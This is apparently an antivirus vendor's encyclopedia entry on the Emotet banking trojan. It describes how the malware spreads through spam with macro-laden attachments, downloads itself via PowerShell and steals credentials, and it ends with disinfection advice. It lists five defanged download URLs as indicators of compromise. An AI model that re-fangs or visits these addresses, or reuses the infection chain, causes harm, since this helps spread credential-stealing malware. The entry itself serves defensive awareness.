Trojan.Win32.Emotet

General Explanation

Type: Trojan

Degree of destruction: high

Prevalence: low

What is a Trojan?

Trojans are types of malware that reveal themselves as healthy and legal software and act most like applicable and useful software, but when they are executed, cause so much destruction to the system. The downloaded software from the internet, Placed in the HTML text, attached to an email, etc. are ways for Trojans to enter the system. Trojans contrary to computer worms and viruses are not reproductive.

What is Emotet malware?

Emotet malware is one of the famous families in stealing users’ validation data. Today we encounter different modules of malware such as user’s account information in the browser, stealing email validation, etc. Emotet distributes its files through infected spam in different networks.

Technical Explanation

Signs of infection 

The method of this malware is to send emails containing infected attached files or links. The downloaded file from infected links is generally in doc or js format. Doc files contain infected macros and by executing the file, the macro function will be recalled and a PowerShell process will be executed. In the following, the PowerShell process will connect to the following links to download the malware execution file.

  • hxxp://eclatpro.com/tleyLN/
  • hxxp://teplokratiya.ru/giG1isC/
  • hxxp://xn--k1acdflk8dk.xn--p1ai/DAA4WB/
  • hxxp://soo.sg/dbs/media/sJUjDl/
  • hxxp://rosehill.hu/ooOCqD/

In case of successful downloading of the execution file, it will store it in the %temp% path and immediately executes it.

The procedure of the Emotet function is that it will apply its infection to the system in three steps:

  1. It will enter the system by infected email
  2. It will download its execution file
  3. It will download its main module, by executing the downloaded file and connecting to its server

The execution file of the malware after it is successfully connected to the desired server will send itself the system processes information in addition to software data such as Microsoft Outlook or such software which are related to the victim’s email.

After that the information trade is completed between the victim’s system and server, the server will proceed to send the infected module to the victim’s system. This module will be executed by the execution file of the malware

Emotet malware modules are divided into some categories which include:

  1. Stealing the validation data
  2. Distributing the malware by sending spam
  3. DDoS attacks
  4. Stealing data about individuals’ user account from the browsers
  5. Stealing validation data from E-post services.

How to deal with it and disinfect the system

Padvish Antivirus will detect this malware and disinfect the system. To prevent entering these types of malware into the system it is recommended to avoid clicking on suspicious links and scan attached files before execution. Also, always keep your anti-virus and OS updated, if possible.

  0 people found this article useful

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>